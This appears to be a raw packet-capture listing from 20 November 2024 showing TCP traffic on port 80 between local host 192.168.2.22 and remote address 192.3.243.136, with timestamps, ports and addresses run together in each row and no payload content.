                                                                    Nov 20, 2024 07:56:35.968143940 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.968175888 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.968188047 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.968199015 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.968200922 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.968216896 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.968225002 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.969084978 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.969098091 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.969115019 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.969130993 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.969141006 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.969144106 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.969150066 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.969162941 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.969165087 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.969172955 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.969197035 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:35.970010042 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:35.970057964 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.054016113 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.054048061 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.054076910 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.054086924 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.054101944 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.054115057 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.054130077 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.054140091 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.054142952 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.054143906 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.054143906 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.054151058 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.054143906 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.054167986 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.054183006 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.054183006 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.054183006 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.054191113 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.054194927 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.054455042 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.054465055 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.055021048 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.055073023 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.055075884 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.055093050 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.055107117 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.055114031 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.055116892 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.055149078 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.055439949 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.055485964 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.055510998 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.055547953 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.055556059 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.055572987 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.055593014 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.055605888 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.055613995 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.055624962 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.055634975 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.055645943 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.055651903 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.055668116 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.055686951 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.056422949 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.056489944 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.056515932 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.056531906 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.056552887 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.056555033 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.056560993 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.056570053 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.056587934 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.056591034 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.056597948 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.056605101 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.056624889 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.056638956 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.056657076 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.057357073 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.057400942 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.057411909 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.057415009 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.057435036 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.057437897 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.057442904 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.057455063 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.057491064 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.081865072 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.081897974 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.081917048 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.081935883 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.081947088 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.081963062 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.081979990 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.081995964 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.082036972 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.082629919 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.141196012 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.141293049 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.141303062 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.141330004 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.141343117 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.141369104 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.141380072 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.141391039 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.141402006 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.141407967 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.141402960 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.141418934 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.141434908 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.141436100 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.141436100 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.141448975 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.141463995 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.141809940 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.141968966 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.141994953 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.142009974 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.142045975 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.142146111 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.142157078 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.142174006 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.142184973 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.142194033 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.142199039 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.142210960 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.142216921 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.142240047 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.142498970 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.142554045 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.142570019 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.142580986 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.142597914 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.142602921 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.142621994 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.142637014 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.142647982 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.142652035 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.142662048 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.142668009 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.142674923 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.142682076 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.142699957 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.143244028 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.143296003 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.143306971 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.143310070 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.143331051 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.143346071 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:36.143414974 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.143433094 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.143445969 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.143459082 CET8049166192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:36.143465042 CET4916680192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.710911989 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.710923910 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710930109 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.710943937 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.710948944 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710957050 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.710968971 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710984945 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710994959 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710999966 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711011887 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711013079 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711024046 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711028099 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711036921 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711041927 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711050034 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711054087 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711067915 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711078882 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711093903 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711107969 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711110115 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711122036 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711123943 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711133003 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711136103 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711138964 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711153030 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711157084 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711167097 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711169958 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711179018 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711184025 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711193085 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711194992 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711204052 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711208105 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711220980 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711224079 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711230040 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711231947 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711246014 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711261034 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711287022 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711961031 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712008953 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712008953 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.712018967 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712048054 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.712718010 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712760925 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.712857962 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712869883 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712886095 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712894917 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712903976 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.712909937 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712915897 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.712919950 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712933064 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.712935925 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712945938 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712958097 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.712961912 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712980986 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.712994099 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.768650055 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.768667936 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.768687010 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.768781900 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.792635918 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792653084 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792670965 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792771101 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.792793036 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792809963 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792826891 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792838097 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792845964 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.792853117 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792865992 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792869091 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.792877913 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792885065 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.792891026 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792905092 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792907000 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.792917013 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792927980 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.792929888 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792946100 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792954922 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.792977095 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793021917 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793104887 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793114901 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793128014 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793139935 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793142080 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793154955 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793163061 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793179035 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793196917 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793250084 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793261051 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793277025 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793324947 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793342113 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793385983 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793395996 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793411016 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793420076 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793421030 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793426037 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793431997 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793447018 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793448925 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793459892 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793467999 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793473005 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793489933 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793489933 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793509960 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793529034 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793590069 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793644905 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793656111 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793672085 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793680906 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793699980 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793833017 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793843985 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793853998 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793868065 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793883085 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793886900 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793893099 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793905973 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793908119 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793917894 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793925047 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793931007 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793941975 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793943882 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793963909 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793982029 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794054985 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794229031 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794246912 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794256926 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794270992 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794271946 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794291973 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794294119 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794305086 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794310093 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794317961 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794326067 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794328928 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794342041 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794343948 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794354916 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794363976 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794368029 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794379950 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794388056 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794393063 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794404984 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794408083 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794418097 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794425011 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794431925 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794440031 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794445038 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794456959 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794462919 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794470072 CET8049167192.3.243.136192.168.2.22
